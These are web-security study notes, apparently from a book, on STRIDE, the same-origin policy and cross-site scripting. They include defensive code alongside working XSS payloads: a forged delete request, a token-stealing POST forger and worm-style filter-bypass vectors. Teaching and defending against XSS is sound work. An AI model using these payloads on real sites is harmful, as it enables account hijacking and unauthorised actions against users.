Chapter I: Security Worldview
Security is an ongoing process
Six threat categories (the STRIDE model): Spoofing (impersonation), Tampering, Repudiation, Information disclosure (information leakage), Denial of service, Elevation of privilege
A good security solution should:
Solve the problem effectively
Preserve a good user experience
Impose low performance overhead
Be loosely coupled with the system it protects
Be easy to upgrade and extend
Security principles
Secure by default (including the principle of least privilege): prefer a whitelist (allow only what is known to be needed) over a blacklist (block only what is known to be bad); the whitelist constrains a larger scope and is therefore safer
Defense in depth: apply protections at every layer, so that each layer contributes to a complete and effective whole instead of relying on a single control
Separation of data and code: be clear about the boundary between code and data; treating user-supplied data as code to be executed is the root cause of injection-type problems such as XSS
Chapter II: Browser Security
Same-origin policy (SOP): restricts a "document" loaded from one origin from reading or setting certain properties of a document from another origin
The browser defines the concept of an "origin". The factors that determine an origin are: host (domain name or IP address; an IP address is treated as a root domain), subdomain, port, and protocol. In the browser, tags such as <script>, <img>, <iframe> and <link> can load resources across origins and are not restricted by the same-origin policy; when a tag with a "src" attribute is loaded, the browser actually issues a GET request. Unlike XMLHttpRequest, for a resource loaded through a src attribute the browser restricts JavaScript so that it cannot read or write the returned content
For the browser, besides the DOM, cookies and XMLHttpRequest being restricted by the same-origin policy, loaded third-party plug-ins such as Flash and Google Gears each have their own origin-control policies
Browsers adopt a multi-process architecture: Google Chrome splits its main process into a browser process, renderer processes, plug-in processes and extension processes, each isolated from the others so that a fault in one does not affect the rest
IE8 also uses a multi-process architecture, with each tab running in its own process
A sandbox is now used as a synonym for a "resource isolation module": it is designed to let untrusted code run in a confined environment, restricting that code's access to resources outside the isolation boundary, or allowing access only through a defined data channel (an encapsulated API)
The advantage of a multi-process architecture over a single-process one is that when one process crashes the others are not affected
Malicious URL blocking: the browser periodically fetches a list of malicious URLs from the server, and when the user visits one of these URLs a warning page is displayed
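The origin comparison described above, as an added example (not code from the original notes). It uses the WHATWG URL parser's `origin` property, which already normalises default ports, and checks each factor listed above: protocol, host (including subdomain) and port. The sample URLs and the function names `originOf`, `sameOrigin` and `checkSamples` are constructed for the example.

```javascript
// Added example (not from the original notes): compare two URLs the way the
// same-origin policy does. An origin is the triple (protocol, host, port);
// the host comparison is exact, so a subdomain is a different origin, and a
// default port written explicitly is the same origin as one left implicit.
// Sample URLs below are constructed for the example.

function originOf(urlString) {
  const u = new URL(urlString);
  // The parser reports "null" for schemes with no tuple origin (file:, data:,
  // about:); treat those as opaque, which never equals anything.
  if (u.origin === 'null') return null;
  return u.origin; // e.g. "https://blog.example.com" (default port omitted)
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa !== null && ob !== null && oa === ob;
}

// One pair per factor listed above (protocol, host/subdomain, port), plus
// cases that must NOT matter (path, query, explicit default port).
const samples = [
  ['https://www.example.com/a', 'https://www.example.com/b/c?q=1', true],  // path/query irrelevant
  ['https://www.example.com/',  'https://blog.example.com/',        false], // subdomain differs
  ['https://www.example.com/',  'http://www.example.com/',          false], // protocol differs
  ['https://www.example.com/',  'https://www.example.com:8443/',    false], // port differs
  ['https://www.example.com/',  'https://www.example.com:443/',     true],  // 443 is the https default
  ['http://203.0.113.5/',       'http://203.0.113.5:80/x',          true],  // IP host, default port
  ['file:///tmp/a.html',        'file:///tmp/a.html',               false], // opaque origin
];

// Returns true when every sample behaves as annotated.
function checkSamples() {
  return samples.every(([a, b, expected]) => sameOrigin(a, b) === expected);
}
```

Note that this check governs what script may read, not what the page may load: an `<img src>` or `<script src>` pointing at a different origin is still fetched with a GET, as the notes say; the page simply cannot read the response.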
Chapter III: Cross-Site Scripting (XSS)
Cross-site scripting, in full "Cross Site Script", is abbreviated XSS to distinguish it from CSS (Cascading Style Sheets)
By effect, XSS can be divided into the following categories:
Reflected XSS: user input is simply "reflected" back to the browser; the attacker usually has to trick the user into "clicking" a malicious link for the attack to succeed. Also known as "non-persistent XSS"
Stored XSS: user input is "stored" on the server side, which makes the attack very stable. For example, if a blog post contains malicious code, every user who views that post executes it in their browser. Also known as "persistent XSS"
DOM-based XSS: this type is not classified by whether the data is saved on the server; by effect it is also a reflected XSS. It is formed by modifying the page's DOM nodes, for example by closing the current tag, commenting out the rest of a script line with //, or inserting a <script> element in between
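The three DOM-manipulation tricks just listed (closing the tag, commenting out the tail with //, inserting a <script>) only work when user data reaches the output unencoded, so here is an added example (not code from the original notes) of a small page template in its vulnerable and hardened forms. The page shape, the `track(user)` call, the payloads and the helper names `renderVulnerable`, `renderHardened`, `escapeHtml`, `escapeJsString` and `audit` are all constructed for the example.

```javascript
// Added example, not from the original notes. A server-side page template
// that reflects the "name" query parameter into two places: HTML body text
// and a JavaScript string literal inside an inline <script>. The vulnerable
// version concatenates the raw value; the hardened version encodes for each
// output context. Page shape and payloads are constructed for the example.

// Vulnerable: user data becomes part of the markup and of the script source.
function renderVulnerable(name) {
  return [
    '<p>Hello, ' + name + '</p>',
    '<script>var user = "' + name + '"; track(user);</script>',
  ].join('\n');
}

// HTML text/attribute context: entity-encode the characters that can change
// the structure of the markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: \u-encode every non-alphanumeric
// character, so a quote cannot end the literal, "//" cannot comment out the
// rest of the statement, and "</script>" cannot close the element.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(name) {
  return [
    '<p>Hello, ' + escapeHtml(name) + '</p>',
    '<script>var user = "' + escapeJsString(name) + '"; track(user);</script>',
  ].join('\n');
}

// One payload per trick mentioned above.
const payloads = {
  insertScript: '<script>alert(1)</script>',          // insert a new script element
  closeTag:     '</script><script>alert(1)</script>',  // close the element, open another
  breakString:  '";alert(1);//',                       // end the string; // hides the tail
};

// Crude oracle: did a raw "<script>alert(1)" or an unescaped '";alert(1)'
// reach the output? Returns one boolean per payload.
function audit(render) {
  const result = {};
  for (const [key, payload] of Object.entries(payloads)) {
    result[key] = /<script>alert\(1\)|";alert\(1\)/.test(render(payload));
  }
  return result;
}
```

The same rule applies on the client for DOM-based XSS: data taken from `location.hash` or `document.URL` must be written with `textContent` (or encoded as above) rather than assigned to `innerHTML`.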
Advanced XSS attacks
The malicious script that the attacker plants in the page is called the "XSS payload". The most common XSS payload launches a "cookie hijacking" attack by reading the browser's cookie object: the cookie usually carries the current user's (encrypted) login credential, so with it an attacker can log in to the user's account without knowing the password. Cookie defenses are covered in later chapters
Constructing GET and POST requests: if an XSS vulnerability exists on any page in the Sohu blog domain, a GET request can be triggered from a single image:
// Build an <img> whose src points at the state-changing URL; the browser
// issues a GET for it, with the victim's cookies attached, as soon as it is
// inserted into the page.
var img = document.createElement("img");
img.src = "http://blog.sohu.com/manage/entry.do?m=delete&id=156713012";
document.body.appendChild(img);
Getting the blogger to execute this JavaScript is enough to delete the article
XSS code can also imitate the browser in sending GET and POST requests, for example with XMLHttpRequest or by building and submitting a form
For example, against QQ Mail: obtain the SID from the page, encode it, and then use it to simulate the browser's request
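The two-step pattern just described (read a value the server expects from a same-origin page, then forge the request with it), as an added example that is not code from the original notes. The paths "/manage/entry.do?m=list" and "/manage/entry.do", the hidden field name "token", the form fields and the helper names `extractHiddenField`, `encodeForm`, `forgeDelete` and `xhrTransport` are assumptions for this example, not any real site's endpoints; the transport is injected so the logic can be run outside a browser.

```javascript
// Added example, not from the original notes: an XSS payload that forges a
// state-changing POST from inside the victim's origin, in two steps. Step 1
// fetches a same-origin page and lifts a value the server expects to see
// (a hidden form field: an anti-CSRF token, or a session id like the SID
// mentioned above); step 2 submits the POST with it. The transport is
// injected so the logic can be exercised outside a browser. The paths
// "/manage/entry.do?m=list" and "/manage/entry.do", the field name "token"
// and the form fields are assumptions for this example, not a real site's
// endpoints.

// Lift a hidden form field out of an HTML page (assumes the name attribute
// precedes the value attribute, which is the usual order).
function extractHiddenField(html, fieldName) {
  const re = new RegExp(
    '<input[^>]*name=["\']' + fieldName + '["\'][^>]*value=["\']([^"\']*)["\']', 'i');
  const m = re.exec(html);
  return m ? m[1] : null;
}

// application/x-www-form-urlencoded, the encoding a submitted <form> produces.
function encodeForm(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
}

// transport.get(url) -> response body string;
// transport.post(url, body, contentType) -> HTTP status code.
function forgeDelete(transport, entryId) {
  const page = transport.get('/manage/entry.do?m=list');
  const token = extractHiddenField(page, 'token');
  if (token === null) return { ok: false, reason: 'token not found' };
  const body = encodeForm({ m: 'delete', id: entryId, token: token });
  const status = transport.post('/manage/entry.do', body,
    'application/x-www-form-urlencoded');
  return { ok: status === 200, token: token, body: body, status: status };
}

// Browser transport using synchronous XMLHttpRequest. Because the requests
// are same-origin, the victim's cookies are attached automatically; no
// withCredentials flag is needed.
function xhrTransport() {
  return {
    get(url) {
      const x = new XMLHttpRequest();
      x.open('GET', url, false);
      x.send(null);
      return x.responseText;
    },
    post(url, body, contentType) {
      const x = new XMLHttpRequest();
      x.open('POST', url, false);
      x.setRequestHeader('Content-Type', contentType);
      x.send(body);
      return x.status;
    },
  };
}

// In a browser the payload would run as:
//   forgeDelete(xhrTransport(), '156713012');
```

Because the script runs in the victim's origin, it can read the token that a pure CSRF attack could not; this is why an anti-CSRF token does not protect a site that also has an XSS.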
Identifying client-side information
In IE, checking whether an ActiveX control's classid exists reveals whether a given piece of software is installed on the user's machine, so the attacker can choose a matching browser exploit for a drive-by download ("hanging a Trojan"); the example referred to here checks whether Xunlei (Thunder) is installed
Third-party software may leak information: for instance, Flash's System.capabilities object can query the client computer's hardware details
In Firefox the plug-in list is stored in a DOM object, and all plug-ins can be enumerated by traversing navigator.plugins
Obtaining the user's IP address: JavaScript itself cannot read the local IP address, but XSS can do so through third-party software. For example, if a Java runtime is installed on the client, XSS can obtain the client's local IP address by calling a Java applet interface
Security researchers have packaged such XSS payload functions into XSS attack platforms, mainly to demonstrate how dangerous XSS is:
Attack API
BeEF
XSS-Proxy
Ultimate weapon: the XSS worm
In 2005, 19-year-old Samy Kamkar launched an XSS worm against myspace.com. At the time MySpace filtered out many dangerous HTML tags, keeping only "safe" tags such as <a> and <div>, and it also stripped all event handlers such as "onclick", but it allowed CSS, so this still worked:
<div style="background:url('javascript:alert(1)')">
The filtering of sensitive JavaScript keywords was evaded by splitting them (for example writing "java" and "script" separated by a newline, which the browser still accepted as "javascript")
In general, sites with a stored XSS are the ones most likely to suffer XSS worm attacks
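To make the worm's bypass concrete, here is an added example (not code from the original notes, nor MySpace's actual filter): a blacklist-style filter in the shape of the one described above (tag whitelist, on* handlers stripped, CSS trusted) next to a hardened version that applies the "whitelist over blacklist" principle from Chapter I to attribute values as well. All payloads, the tag list and the helper names `naiveFilter`, `hardenedFilter`, `looksScriptCapable`, `survivesNaive` and `survivesHardened` are constructed for the example, and both filters are regex toys for illustration rather than a real sanitizer.

```javascript
// Added example, not from the original notes. A filter in the shape of the
// one described above (tag whitelist, on* handlers stripped, CSS trusted)
// next to a hardened version that applies the whitelist idea from Chapter I
// to attribute values as well. All payloads are constructed for the example;
// the filters are illustrative regex code, not a real sanitizer (a real one
// should be built on an HTML parser).

const ALLOWED_TAGS = new Set(['a', 'div', 'b', 'i', 'br']);

// Naive: drop tags outside the whitelist and any on* attribute, keep the rest.
function naiveFilter(html) {
  return html.replace(/<\/?([a-z0-9]+)([^>]*)>/gi, (tag, name, attrs) => {
    if (!ALLOWED_TAGS.has(name.toLowerCase())) return '';
    const cleaned = attrs.replace(/\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
    return tag.startsWith('</') ? '</' + name + '>' : '<' + name + cleaned + '>';
  });
}

// Whitelist for attribute values. A style value may only contain property
// names, colours, numbers and units: no parentheses, quotes, backslashes,
// newlines or "&", so url(), expression(), entity-encoded or split spellings
// of "javascript:" are all rejected without being enumerated.
const SAFE_STYLE = /^\s*(?:[a-z-]+\s*:[#a-z0-9 .,%-]+;?\s*)*$/i;
const ATTR_RULES = {
  style: (v) => SAFE_STYLE.test(v),
  href:  (v) => /^https?:\/\/[a-z0-9.-]+\/[^"'<>]*$/i.test(v),
  class: (v) => /^[a-z0-9 _-]*$/i.test(v),
};

// Hardened: keep only whitelisted attributes whose values pass their rule.
function hardenedFilter(html) {
  return naiveFilter(html).replace(/<([a-z0-9]+)([^>]*)>/gi, (tag, name, attrs) => {
    const kept = [];
    const re = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
    let m;
    while ((m = re.exec(attrs)) !== null) {
      const attrName = m[1].toLowerCase();
      const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
      const rule = ATTR_RULES[attrName];
      if (rule && rule(value)) kept.push(attrName + '="' + value + '"');
    }
    return '<' + name + (kept.length ? ' ' + kept.join(' ') : '') + '>';
  });
}

// Detection-side oracle: does "javascript:" (or a relative) survive after
// undoing the usual hiding tricks (numeric entities, whitespace, case)?
function looksScriptCapable(html) {
  const v = html
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/[\s\x00-\x1f]+/g, '')
    .toLowerCase();
  return /javascript:|vbscript:|expression\(/.test(v);
}

// Constructed payloads in the shape of the worm's vector, plus one the naive
// filter does stop and one benign input that must survive.
const payloads = [
  "<div style=\"background:url('javascript:alert(1)')\">x</div>",
  "<div style=\"background:url('java\nscript:alert(1)')\">x</div>",   // split keyword
  "<div style=\"background:url('&#106;avascript:alert(1)')\">x</div>", // entity-encoded "j"
  '<a href="javascript:alert(1)">x</a>',                              // same idea in href
  '<div onclick="alert(1)"><script>alert(1)</script>y</div>',         // naive filter handles this
  '<div class="note" style="color: red; font-size: 12px">ok</div>',   // benign, must be kept
];

function survivesNaive()    { return payloads.map((p) => looksScriptCapable(naiveFilter(p))); }
function survivesHardened() { return payloads.map((p) => looksScriptCapable(hardenedFilter(p))); }
```

The point of the whitelist is that the split-keyword and entity-encoded variants never have to be anticipated: anything outside the small safe alphabet is dropped, whereas a blacklist has to guess every spelling an attacker might try.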